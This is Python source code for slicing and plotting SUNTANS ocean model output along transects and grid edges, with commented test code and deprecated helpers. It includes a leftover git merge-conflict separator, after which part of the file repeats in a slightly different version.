h1 = plt.contourf(self[xaxis][0,:],self.time[self.tstep],am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Time')
axcb = plt.colorbar(h1)
titlestr='%s [%s]\nLayer: %s'%(self.long_name,self.units,zstring)
plt.title(titlestr)
return h1, axcb
def plotslice(self):
"""
Plots the slice location on a map
"""
self.contourf(z=-self.dv,clevs=30,titlestr='',cmap='gist_earth')
plt.plot(self.xslice[0,:],self.yslice[0,:],'m--')
def animate(self,**kwargs):
"""
Animates the slice
"""
# Initialise the plot object
h1,cb = self.pcolorslice(**kwargs)
fig = plt.gcf()
ax = fig.gca()
title=ax.set_title("")
def updateScalar(ii):
a=self.data[ii,:].squeeze()
am = np.ma.array (a, mask=np.isnan(a))
h1.set_array(am[am.mask==False])
title.set_text(self.__genTitle(tt=self.tstep[ii]))
return (title,h1)
self.anim = animation.FuncAnimation(fig, updateScalar, frames=len(self.tstep), interval=50, blit=True)
def loadData(self, variable, method='linear'):
"""
Interpolates the data in raw data onto the slice array
"""
tstep = self.tstep
self.Ntslice = len(tstep)
slicedata = np.zeros((self.Ntslice,self.Nkmax,self.Npt))
#if method=='linear':
# cellind3d = np.repeat(self.cellind.reshape((1,self.Npt)),self.Nkmax,axis=0)
# k3d = np.arange(0,self.Nkmax)
# k3d = np.repeat(k3d.reshape((self.Nkmax,1)),self.Npt,axis=1)
for tt in range(self.Ntslice):
if self.Ntslice>1:
print('Slicing data at time-step: %d of %d...'%(tt,self.Ntslice))
self.tstep=[tstep[tt]]
rawdata = Spatial.loadData(self, variable=variable)
for kk in range(self.Nkmax):
if method == 'nearest':
slicedata[tt,kk,:] = rawdata[kk,self.cellind]
elif method == 'linear':
slicedata[tt,kk,:] = self.interpLinear(rawdata[kk,:].squeeze(),self.xslice[0,:],self.yslice[0,:],self.cellind,k=kk)
else:
raise Exception(' unknown interpolation method: %s. Must be "nearest" or "linear"'%method)
mask = self.maskslice.reshape((1,self.Nkmax,self.Npt))
mask = mask==False
mask = mask.repeat(self.Ntslice,axis=0)
slicedata[mask] = np.nan
self.tstep=tstep
return slicedata.squeeze()
def get_klayer(self):
if self.klayer[0]==-99:
klayer=list(range(self.Nkmax))
Nkmax = self.Nkmax
else:
klayer=self.klayer
Nkmax=len(klayer)
return klayer,Nkmax
def _initInterp(self):
"""
Initialise the interpolant
Finds the horizontal indices of the slice points and
constructs the 3D mask array
"""
# Find the cell index of each point along the slice
self.Tri = GridSearch(self.xp,self.yp,self.cells)
self.cellind = self.Tri(self.xslice,self.yslice)
klayer,Nkmax = self.get_klayer()
# Construct the 3D coordinate arrays
self.xslice = np.repeat(self.xslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.yslice = np.repeat(self.yslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.distslice = np.repeat(self.distslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.zslice = np.repeat(-self.z_r[klayer].reshape((self.Nkmax,1)),self.Npt,axis=1)
# Construct the mask array
self.calc_mask()
# Get the bathymetry along the slice
self.hslice = -self.dv[self.cellind]
def calc_mask(self):
""" Construct the mask array"""
self.maskslice = np.zeros((self.Nkmax,self.Npt),dtype=np.bool)
for kk in range(self.Nkmax):
for ii in range(self.Npt):
if kk <= self.Nk[self.cellind[ii]]:
self.maskslice[kk,ii]=True
def _getSliceCoords(self,kind=3):
"""
Fits a spline through the input slice points
# Kind is the linear interpolation type
"""
n = self.xpt.shape[0]
t = np.linspace(0,1,n)
tnew = np.linspace(0,1,self.Npt)
if n <= 3:
kind='linear' # Spline won't work with <= 3 points
else:
kind=kind
Fx = interp1d(t,self.xpt,kind=kind)
Fy = interp1d(t,self.ypt,kind=kind)
self.xslice = Fx(tnew)
self.yslice = Fy(tnew)
self._getDistCoords()
def _getDistCoords(self):
# Calculate the distance along the slice
self.distslice = np.zeros_like(self.xslice)
self.distslice[1:] = np.sqrt( (self.xslice[1:]-self.xslice[:-1]) **2 + \
(self.yslice[1:]-self.yslice[:-1]) **2 )
self.distslice = self.distslice.cumsum()
def _getXYgraphically(self):
"""
Plot a map of the bathymetry and graphically select the slice points
"""
self.contourf(z=-self.dv,clevs=30,titlestr='Select points for slice on map\nRight-click to finish; middle-click to remove last point.',cmap='gist_earth')
x = plt.ginput(n=0,timeout=0,mouse_pop=2,mouse_stop=3)
# Find the location of the slice
xy = np.array(x)
self.xpt=xy[:,0]
self.ypt=xy[:,1]
self._getSliceCoords()
plt.plot(self.xslice,self.yslice,'m--')
plt.title('Close figure to continue...')
plt.show()
def _getXlabel(self,xaxis):
if xaxis == 'xslice':
xlab = 'Easting [m]'
elif xaxis == 'yslice':
xlab = 'Northing [m]'
elif xaxis == 'distslice':
xlab = 'Distance along transect [m]'
else:
raise Exception(' unknown "xaxis" value %d.\n Must be one of "xslice", "yslice" or "distslice".'%xaxis)
return xlab
def _overlayBathy(self,xdata,**kwargs):
"""
Pretty bathymetry overlay
"""
plt.fill_between(xdata,self.hslice,y2=self.hslice.min(),zorder=1e6,**kwargs)
def __genTitle(self,tt=None):
if tt is None:
if type(self.tstep)==int:
tt = self.tstep
else:
tt = self.tstep[0]
titlestr='%s [%s]\nTime: %s'%(self.long_name,self.units,\
datetime.strftime(self.time[tt],'%d-%b-%Y %H:%M:%S'))
return titlestr
class SliceEdge(Slice):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
edgemethod=1
abortedge=False
def __init__(self,ncfile,xpt=None,ypt=None,klayer=[-99],\
MAXITER=10000, Npt=100, **kwargs):
self.Npt=Npt
self.MAXITER=MAXITER
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpt,ypt):
"""
Updates the x and y coordinate info in the object
"""
if xpt is None or ypt is None:
self._getXYgraphically()
else:
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
self.j,self.nodelist =\
self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[self.nodelist]
self.yslice=self.yp[self.nodelist]
self.zslice = -self.z_r
self._getDistCoords()
self.edgexy()
# The x and y arrys need to be resized
self.xslice = 0.5*(self.xslice[1:]+self.xslice[0:-1])
self.yslice = 0.5*(self.yslice[1:]+self.yslice[0:-1])
self.distslice = 0.5*(self.distslice[1:]+self.distslice[0:-1])
# Get the mask
self.calc_mask()
# Calculate the area
self.area = self.calc_area()
# Calculate the normnal
self.ne1, self.ne2, self.enormal = self.calc_normal(self.nodelist,self.j)
# Get the bathymetry along the slice
de = self.get_edgevar(self.dv)
self.hslice = -de[self.j]
def loadData(self,variable=None,setunits=True,method='mean'):
"""
Load the specified suntans variable data as a vector
Overloaded method for edge slicing - it is quicker to load time step by
time step in a loop.
method: edge interpolation method - 'mean', 'max'
"""
nc = self.nc
if variable is None:
variable=self.variable
if setunits:
try:
self.long_name = nc.variables[variable].long_name
self.units= nc.variables[variable].units
except:
self.long_name = ''
self.units=''
j=self.j
# Check if cell-centered variable
is3D=True
isCell=False
if self.hasVar(variable):
if self.hasDim(variable,self.griddims['Ne']):
isCell=False
elif self.hasDim(variable,self.griddims['Nc']):
isCell=True
# Check if 3D
if self.hasDim(variable,self.griddims['Nk']) or\
self.hasDim(variable,'Nkw'): # 3D
is3D=True
else:
is3D=False
else:
isCell=True
if isCell:
nc1 = self.grad[j,0].copy()
nc2 = self.grad[j,1].copy()
# check for edges (use logical indexing)
ind1 = nc1==-1
nc1[ind1]=nc2[ind1]
ind2 = nc2==-1
nc2[ind2]=nc1[ind2]
klayer,Nkmax = self.get_klayer()
# This crashes if the variable doesn't exist like area
if self.hasDim(variable,'Nkw'): # vertical velocity
Nkmax +=1
def ncload(nc,variable,tt):
if variable=='agemean':
ac = nc.variables['agec'][tt,klayer,:]
aa = nc.variables['agealpha'][tt,klayer,:]
tmp = aa/ac
tmp[ac<1e-12]=0.
return tmp/86400.
if variable=='area':
eta = nc.variables['eta'][tt,:]
dzf = self.getdzf(eta)
dzf = Spatial.getdzf(self,eta)
return self.df*dzf
else:
if nc.variables[variable].ndim==1:
return nc.variables[variable][:]
elif self.hasDim(variable,self.griddims['Nk']): # 3D
return nc.variables[variable][tt,klayer,:]
else:
return nc.variables[variable][tt,:]
# For loop where the data is extracted
nt = len(self.tstep)
ne = len(self.j)
if is3D==True:
self.data = np.zeros((nt,Nkmax,ne))
else:
self.data = np.zeros((nt,ne))
for ii,tt in enumerate(self.tstep):
#tmp=nc.variables[variable][tt,:,:]
tmp = ncload(nc,variable,tt)
# Return the mean for cell-based variables
if isCell:
if method == 'mean':
self.data[ii,...] = 0.5*(tmp[...,nc1]+tmp[...,nc2])
elif method == 'max':
tmp2 = np.dstack((tmp[...,nc1], tmp[...,nc2]))
self.data[ii,...] =tmp2.max(axis=-1)
else:
self.data[ii,...]=tmp[...,self.j]
# Average 'w'
if self.hasDim(variable,'Nkw'):
self.data = self.data[:,1:]*0.5 + self.data[:,0:-1]*0.5
# Mask 3D data
if is3D:
maskval=0
self.data[ii,self.maskslice]=maskval
#fillval = 999999.0
#self.mask = self.data==fillval
#self.data[self.mask]=0.
self.data[self.data==self._FillValue]=0.
self.data = self.data.squeeze()
return self.data
def edgexy(self):
"""
Nx2 vectors outlining each cell in the edge slice
"""
def closePoly(xp,node,k):
return np.array([ [xp[node],\
xp[node+1],xp[node+1], xp[node],xp[node]],\
[-self.z_w[k],-self.z_w[k],-self.z_w[k+1],-self.z_w[k+1],-self.z_w[k]],\
]).T
self.xye = [closePoly(self.distslice,jj,kk) for kk in range(self.Nkmax) \
for jj in range(len(self.j)) ]
def calc_normal(self,nodelist,j):
"""
Calculate the edge normal
"""
# Calculate the unit normal along the edge
P1 = GPoint(self.xp[nodelist][0:-1],self.yp[nodelist][0:-1])
P2 = GPoint(self.xp[nodelist][1:],self.yp[nodelist][1:])
L = Line(P1,P2)
ne1,ne2 = L.unitnormal()
# Compute the unique normal of the dot product
enormal = np.round(self.n1[j]*ne1 +\
self.n2[j]*ne2)
return ne1,ne2,enormal
def mean(self,phi,axis='time'):
"""
Calculate the mean of the sliced data along an axis
axis: time, depth, area
time : returns the time mean. size= (Nk, Nj)
depth: returns the time and spatial mean. Size = (Nk)
area: returns the area mean. Size = (Nt)
"""
if axis=='time':
return np.mean(phi,axis=0)
elif axis=='area':
area_norm = self.area / self.area.sum()
return np.sum( np.sum(phi*area_norm,axis=-1),axis=-1)
elif axis=='depth':
dx = self.df[self.j]
dx_norm = dx / dx.sum()
return np.sum( self.mean(phi,axis='time')*dx_norm,axis=-1)
def plot(self,z,titlestr=None,**kwargs):
"""
Pcolor plot of the slice
"""
if self.clim is None:
self.clim=[]
self.clim.append(np.min(z))
self.clim.append(np.max(z))
# Set the xy limits
xlims=[self.distslice.min(),self.distslice.max()]
ylims=[-self.z_w.max(),-self.z_w.min()]
self.fig,self.ax,self.patches,self.cb=unsurf(self.xye,z.ravel(),xlim=xlims,ylim=ylims,\
clim=self.clim,**kwargs)
self.ax.set_aspect('auto')
def plotedges(self,color='m',**kwargs):
"""
plot for testing
"""
self.plotmesh()
#plt.plot(self.edgeline.xy,'r')
for ee in self.j:
plt.plot([self.xp[self.edges[ee,0]],self.xp[self.edges[ee,1]]],\
[self.yp[self.edges[ee,0]],self.yp[self.edges[ee,1]]],color=color,\
**kwargs)
def calc_area(self,eta=None):
"""
Calculate thee cross-sectional area of each face
"""
if eta is None:
eta = np.zeros((self.nslice,)) # Assumes the free-surface is zero
dzf = self.getdzf(eta)
area = dzf * self.df[self.j]
area[self.maskslice]=0
return area
def getdzf(self,eta):
""" Get the cell thickness along each edge of the slice"""
#dzf = Spatial.getdzf(self,eta,j=self.j)
dzf = np.repeat(self.dz[:,np.newaxis],len(self.j), axis=1)
dzf[self.maskslice]=0
return dzf
def get_width(self):
"""
Calculate the width of each edge as a 2d array
Missing cells are masked
"""
df = self.df[self.j]
width = np.ones((self.Nkmax,1)) * df[np.newaxis,:]
width[self.maskslice]=0
return width
def calc_mask(self):
""" Construct the mask array"""
klayer,Nkmax=self.get_klayer()
self.maskslice = np.zeros((Nkmax,len(self.j)),dtype=np.bool)
for k,kk in enumerate(klayer):
for ii,j in enumerate(self.j):
if kk >= self.Nke[j]:
self.maskslice[k,ii]=True
def get_edgeindices(self,xpt,ypt,method=1, abortedge=True):
"""
Return the indices of the edges (in order) along the line
method - method for line finding algorithm
0 - closest point to line
1 - closest point without doing a u-turn
abortedge - Set true to abort when slice hits a boundary
"""
# Load the line as a shapely object
#edgeline = asLineString([self.xslice,self.yslice])
Npt = xpt.shape[0]
xyline = [(xpt[ii],ypt[ii]) for ii in range(Npt)]
self.edgeline = LineString(xyline)
# Find the nearest grid Node to the start and end of the line
xy_1 = np.vstack((xpt[0],ypt[0])).T
node0 = self.grd.findnearest(xy_1)
xy_2 = np.vstack((xpt[-1],ypt[-1])).T
endnode = self.grd.findnearest(xy_2)
# This is the list containing all edge nodes
nodelist = [node0[0]]
def connecting_nodes(node,nodelist):
""" finds the nodes connecting to the node"""
edges = self.grd.pnt2edges(node)
cnodes = []
for ee in edges:
for nn in self.grd.edges[ee]:
if nn not in nodelist:
cnodes.append(nn)
return cnodes
def min_dist(nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((self.xp[nn],self.yp[nn])) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_line(cnode,nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
#lines = [LineString([(self.xp[cnode],self.yp[cnode]),\
# (self.xp[nn],self.yp[nn])]) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_angle(cnode,nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
dist = np.array(dist)
# Calculate the angle along the line of the new coordinate
def calc_ang(x1,x2,y1,y2):
return np.arctan2( (y2-y1),(x2-x1) )
angle1 = [calc_ang(self.xp[cnode],self.xp[nn],\
self.yp[cnode],self.yp[nn]) for nn in nodes]
# Calculate the heading of the line near the two points
def calc_heading(P1,P2,L):
d1 = L.project(P1)
d2 = L.project(P2)
if d1 <= d2:
P3 = L.interpolate(d1)
P4 = L.interpolate(d2)
else:
P3 = L.interpolate(d2)
P4 = L.interpolate(d1)
return calc_ang(P3.xy[0][0],P4.xy[0][0],P3.xy[1][0],P4.xy[1][0])
P1 = Point((self.xp[cnode],self.yp[cnode]))
angle2 = [calc_heading(P1,Point( (self.xp[nn],self.yp[nn]) ),line) \
for nn in nodes]
angdiff = np.array(angle2) - np.array(angle1)
# Use the minimum distance unless the point is a u-turn
rank = np.argsort(dist)
for nn in range(dist.shape[0]):
if np.abs(angdiff[rank[nn]]) <= np.pi/2:
return nodes[rank[nn]]
# if they all u-turn return the min dist
if rank.size==0:
return None
else:
return nodes[rank[0]]
# Loop through and find all of the closest points to the line
MAXITER=self.MAXITER
for ii in range(MAXITER):
cnodes = connecting_nodes(nodelist[-1],nodelist)
#if method==0:
# newnode = min_dist(cnodes,self.edgeline)
if method==0:
newnode = min_dist_line(nodelist[-1],cnodes,self.edgeline)
elif method==1:
newnode = min_dist_angle(nodelist[-1],cnodes,self.edgeline)
#print 'Found new node: %d...'%newnode
if newnode is None:
break
if ii>1 and abortedge:
if self.mark[self.grd.find_edge([newnode,nodelist[-1]])] not in [0,5]:
print('Warning: reached a boundary cell. Aborting edge finding routine')
break
nodelist.append(newnode)
if newnode == endnode:
#print 'Reached end node.'
break
# Return the list of edges connecting all of the nodes
return [self.grd.find_edge([nodelist[ii],nodelist[ii+1]]) for ii in\
range(len(nodelist)-1)], nodelist
class MultiSliceEdge(SliceEdge):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
def __init__(self,ncfile,xpt=None,ypt=None,Npt=100,klayer=[-99],\
MAXITER=10000, **kwargs):
self.MAXITER=MAXITER
self.Npt=Npt
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpts,ypts):
"""
Updates the x and y coordinate info in the object
"""
self.slices=[]
for xpt,ypt in zip(xpts,ypts):
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
j,nodelist = self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.j = j # Need this to calculate other quantities
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[nodelist]
self.yslice=self.yp[nodelist]
self._getDistCoords()
# Get the mask
self.calc_mask()
# Get the area and the normal
area = self.calc_area()
ne1, ne2, enormal = self.calc_normal(nodelist,j)
dx = self.df[j]
# Store all of the info as a dictionary
self.slices.append({'j':j,'nodelist':nodelist,\
'xslice':self.xslice,'yslice':self.yslice, \
'distslice':self.distslice,'area':area,'normal':enormal,'dx':dx})
# Find the unique j values and sort them
j=[]
for ss in self.slices:
j = j + ss['j']
j = np.array(j)
self.j = np.sort(np.unique(j))
# Find the index of each slice into this j array
for ii,ss in enumerate(self.slices):
ind = np.searchsorted(self.j,np.array(ss['j']))
self.slices[ii].update({'subind':ind})
self.j = self.j.tolist()
def loadData(self,**kwargs):
"""
Overloaded method of MultiEdgeSlice
loads the data and then inserts it into each slice dictionary
returns a list of 3D arrays
"""
SliceEdge.loadData(self,**kwargs)
data=[]
for ii,ss in enumerate(self.slices):
data.append(self.data[...,ss['subind']])
return data
def mean(self,phi,axis='area'):
"""
Calculate the mean of the sliced data along an axis
axis: depth, area
depth: returns the time and spatial mean. Size = (Nslice,Nk)
area: returns the area mean. Size = (Nslice,Nt)
"""
Nslice = len(self.slices)
Nt = len(self.tstep)
Nk = self.Nkmax
if axis=='area':
data = np.zeros((Nslice,Nt))
for ii,ss in enumerate(self.slices):
area_norm = ss['area']/ ss['area'].sum()
data[ii,:] = np.sum( np.sum(phi[ii]*area_norm,axis=-1),axis=-1)
elif axis=='depth':
data = np.zeros((Nslice,Nk))
for ii,ss in enumerate(self.slices):
phimean = np.mean(phi[ii],axis=0) # time mean
dx = self.df[ss['j']]
ne = len(ss['j'])
dx = np.repeat(dx[np.newaxis,:],Nk,axis=0)
dx[phimean==0.]=0
dx_sum = dx.sum(axis=-1)
dx_sum = np.repeat(dx_sum[:,np.newaxis],ne,axis=-1)
dx_norm = dx / dx_sum
data[ii,:] = np.sum( phimean*dx_norm,axis=-1)
else:
raise Exception('axis = %s not supported'%axis)
return data
#####
## Testing data
#
####
## Inputs
#ncfile = 'C:/Projects/GOMGalveston/MODELLING/ForcingSensitivity/rundata/GalvCoarse_AprMay_2010_TWRH_007.nc'
#
#xpt = np.array([ 334640.1250722 , 331097.21398258, 327837.73578013,
# 324861.69046485, 323444.526029 , 321177.06293164,
# 319334.74916504, 318059.30117277, 319618.18205221,
# 322310.79448032, 326987.43711862, 329113.18377239,
# 332939.52774918])
#
#ypt = np.array([ 3247017.02417632, 3247867.32283783, 3247867.32283783,
# 3250559.93526594, 3254386.27924273, 3259488.07121179,
# 3263456.13163216, 3267140.75916537, 3272525.98402159,
# 3275785.46222404, 3281170.68708027, 3287264.49415442,
# 3292649.71901064])
#
#outfile = 'TestSlice.mov'
####
#sun = Slice(ncfile,xpt=xpt,ypt=ypt,Npt=500)
#
#temp = sun('salt',range(23),method='linear')
#
## Test ploting
##sun.pcolors(t=1,xaxis='distslice')
##plt.show()
#
## Test animation
##sun.animate(xaxis='yslice')
##sun.saveanim(outfile)
##plt.show()
#
## Test the xtplot
##sun.xtplot(zlayer='seabed',xaxis='yslice')
##plt.show()
#
#sun.plotslice()
#plt.show()
#
#tempnodes = sun.cell2nodeki(temp[0,:],sun.cellind,0*np.ones_like(sun.cellind))
#cell_scalar = sun.loadData(variable='temp')
## Get the values at the nodes
#for kk in range(30):
# print kk
# tempnode = sun.cell2nodek(cell_scalar[kk,:],k=kk)
# Gradient routine
#dH_dx,dH_dy = sun.gradH(sun.dv,0)
##
#sun.plot(dH_dx,titlestr='')
#plt.show()
# Test out an interpolation tool
#temp = sun('salt',1)
#dT_dx,dT_dy = sun.gradH(cell_scalar[0,:],cellind=sun.cellind,k=0)
########################################################
# Deprecated functions
########################################################
# def cell2nodek(self,cell_scalar,k=0):
# """
# ### NOT USED ###
#
# Map a cell-based scalar onto a node
#
# Uses sparse matrices to do the heavy lifting
# """
# if not self.__dict__.has_key('_datasparse'):
# self._datasparse=[]
# self._Asparse=[]
# self._indsparse=[]
# for kk in range(self.Nkmax):
# self._datasparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._Asparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._indsparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.int))
#
# for i in range(self.Nc):
# for j in range(3):
# if kk <= self.Nk[i]:
# self._Asparse[kk][self.cells[i,j],i] = self.Ac[i]
#
# self._Asparse[kk]=self._Asparse[kk].tocoo()
#
# for i in range(self.Nc):
# for j in range(3):
# if k <= self.Nk[i]:
# self._datasparse[k][self.cells[i,j],i] = cell_scalar[i]
# #self._Asparse[k][self.cells[i,j],i] = self.Ac[i]
# #self._indsparse[k][self.cells[i,j],i] = i
#
# node_scalar = self._datasparse[k].tocoo().multiply(self._Asparse[k]).sum(axis=1) / self._Asparse[k].sum(axis=1)
#
# return np.array(node_scalar).squeeze()
# def cell2nodekold(self,cell_scalar,k=0):
# """
# Map a cell-based scalar onto a node
#
# This is calculated via a mean of the cells connected to a node(point)
# """
#
# # Area weighted interpolation
# node_scalar = [np.sum(cell_scalar[self.pnt2cellsk(k,ii)]*self.Ac[self.pnt2cellsk(k,ii)])\
# / np.sum( self.Ac[self.pnt2cellsk(k,ii)]) for ii in range(self.Np)]
# return np.array(node_scalar)
#
# def cell2nodeki(self,cell_scalar,cellind,k):
# """
# NOT WORKING
#
# ## Needs an additional lookup index to go from local cell index to the main
# grid cell index
#
# Map a cell-based scalar onto a node
#
# This returns the nodes values of the nodes connected to cells, cellind at
# vertical level, k
#
# This is useful for finding the nodal values for a limited number of points, i.e.,
# during interpolation
# """
# ind = self.cells[cellind,:]
#
# node_scalar = np.zeros_like(ind)
#
# ni = cellind.shape[0]
#
# for ii in range(ni):
# for jj in range(3):
# node_scalar[ii,jj] = np.sum(cell_scalar[self.pnt2cellsk(k[ii],ind[ii,jj])]*self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])\
# / np.sum( self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])
#
#
# return node_scalar
#
# def pnt2cellsk(self, k, pnt_i):
# """
# Returns the cell indices for a point, pnt_i at level, k
#
# (Stolen from Rusty's TriGrid class)
# """
# if not self.__dict__.has_key('_pnt2cellsk'):
# # build hash table for point->cell lookup
# self._pnt2cellsk = []
# for k in range(self.Nkmax):
# self._pnt2cellsk.append({})
# for i in range(self.Nc):
# for j in range(3):
# if not self._pnt2cellsk[k].has_key(self.cells[i,j]):
# self._pnt2cellsk[k][self.cells[i,j]] = []
# if k <= self.Nk[i]:
# self._pnt2cellsk[k][self.cells[i,j]].append(i)
# return self._pnt2cellsk[k][pnt_i]
#
# def pnt2cellsparse(self,pnt_i):
#
# pdb.set_trace()
# #self._pnt2cellsk = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
# testsparse = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
#
# for i in range(self.Nc):
# for j in range(3):
# #self._pnt2cells[self.cells[i,j],i] = i
# testsparse[self.cells[i,j],i] = i
#
# pdb.set_trace()
=======
# -*- coding: utf-8 -*-
"""
Object for vertical slicing SUNTANS model output
Created on Wed Jul 03 12:29:14 2013
@author: mrayson
"""
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
import matplotlib.animation as animation
from shapely.geometry import LineString, Point
from sfoda.ugrid.hybridgrid import Line
from sfoda.ugrid.hybridgrid import Point as GPoint
from sfoda.ugrid.gridsearch import GridSearch
from .sunpy import Spatial
from .sunpy import unsurf
class Slice(Spatial):
"""
Suntans vertical slice class
"""
def __init__(self,ncfile,xpt=None,ypt=None,Npt=100):
Spatial.__init__(self,ncfile,klayer=[-99])
# Calculate the horizontal coordinates of the slice
self.Npt = Npt
self.nslice = Npt # For compatibility with other slice classes
if xpt is None or ypt is None:
self._getXYgraphically()
else:
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords()
# Initialise the slice interpolation object
self._initInterp()
def __call__(self,variable,tstep,method='nearest'):
"""
Load the data and interpolate on the slice
"""
self.tstep=tstep
try:
self.Ntslice = len(tstep)
except:
tstep=[tstep]
self.Ntslice = 1
self.data = self.loadData(variable,method=method)
return self.data.squeeze()
def pcolorslice(self, z, t=0,xaxis='xslice',\
titlestr=None, bathyoverlay=True, colorbar=True,**kwargs):
"""
Pcolor plot of the slice
Returns a handle to the pcolor object and the colorbar
"""
# Find the colorbar limits if unspecified
#a=self.data[t,:].squeeze()
am = np.ma.array (z, mask=np.isnan(self.data))
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
#h1 = plt.pcolor(self[xaxis],self.zslice,am,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
X,Z = np.meshgrid(self[xaxis], self.zslice)
h1 = plt.pcolormesh(X, Z, am,vmin=self.clim[0],vmax=self.clim[1],
shading='auto', **kwargs)
#h1 = plt.imshow(am,vmin=self.clim[0],vmax=self.clim[1],\
# extent=[self[xaxis].min(), self[xaxis].max(),\
# -self.z_w[-1], -self.z_w[0]], aspect='auto',\
# **kwargs)
#Overlay the bed
if bathyoverlay:
self._overlayBathy(self[xaxis],facecolor=[0.5,0.5,0.5])
#self._overlayBathy(self[xaxis][0,:],facecolor=[0.5,0.5,0.5])
# Set labels etc
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Depth [m]')
plt.xlim([self[xaxis].min(),self[xaxis].max()])
plt.ylim([self.hslice.min(),0])
if colorbar:
axcb = plt.colorbar(h1)
else:
axcb = None
if titlestr is None:
title = plt.title(self.__genTitle())
else:
title = plt.title(titlestr)
return h1, axcb, title
def contourslice(self,z,t=0,xaxis='xslice',clevs=20,titlestr=None,bathyoverlay=True,\
filled = True, outline = False,colorbar=True,**kwargs):
"""
Filled-contour plot of the slice
Returns a handle to the pcolor object and the colorbar
"""
if not filled:
outline=True
#a=self.data[t,:].squeeze()
am = np.ma.array (z, mask=np.isnan(z))
# Find the colorbar limits if unspecified
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
klayer,Nkmax = self.get_klayer()
if type(clevs)==type(1): # is integer
V = np.linspace(self.clim[0],self.clim[1],clevs)
else:
V = clevs
if filled:
h1 = plt.contourf(self[xaxis],self.zslice,am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
if outline:
h2 = plt.contour(self[xaxis],self.zslice,am,V,**kwargs)
#Overlay the bed
if bathyoverlay:
self._overlayBathy(self[xaxis][:],facecolor=[0.5,0.5,0.5])
# Set labels etc
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Depth [m]')
plt.xlim([self[xaxis].min(),self[xaxis].max()])
plt.ylim([self.hslice.min(),0])
if colorbar and filled:
axcb = plt.colorbar(h1)
if titlestr is None:
plt.title(self.__genTitle())
else:
plt.title(titlestr)
if filled and not outline:
return h1,
elif not filled and outline:
return h2,
elif filled and outline:
return h1, h2,
def xtplot(self,zlayer=0,xaxis='xslice',clevs=20,titlestr=None,**kwargs):
"""
x-t contour plot of the sliced variable along vertical layer, 'zlayer'.
zlayer can be:
[0 - Nkmax] - vertical layer number
'seabed' - seabed value
'diff' - top minus bottom difference)
"""
#kbed = np.max(self.Nk[self.cellind]-1,0)
kbed = self.Nk[self.cellind]
if zlayer == 'seabed':
a= self.data[:,kbed,list(range(0,self.Npt))]
zstring = 'seabed'
elif zlayer == 'diff':
atop = self.data[:,0,:]
abot = self.data[:,kbed,list(range(0,self.Npt))]
a = atop - abot
zstring = 'Surface value - seabed value'
else:
a = self.data[:,zlayer,:]
zstring = '%3.1f [m]'%self.z_r[zlayer]
am = np.ma.array (a, mask=np.isnan(a))
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
V = np.linspace(self.clim[0],self.clim[1],clevs)
h1 = plt.contourf(self[xaxis][0,:],self.time[self.tstep],am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Time')
axcb = plt.colorbar(h1)
titlestr='%s [%s]\nLayer: %s'%(self.long_name,self.units,zstring)
plt.title(titlestr)
return h1, axcb
def plotslice(self):
"""
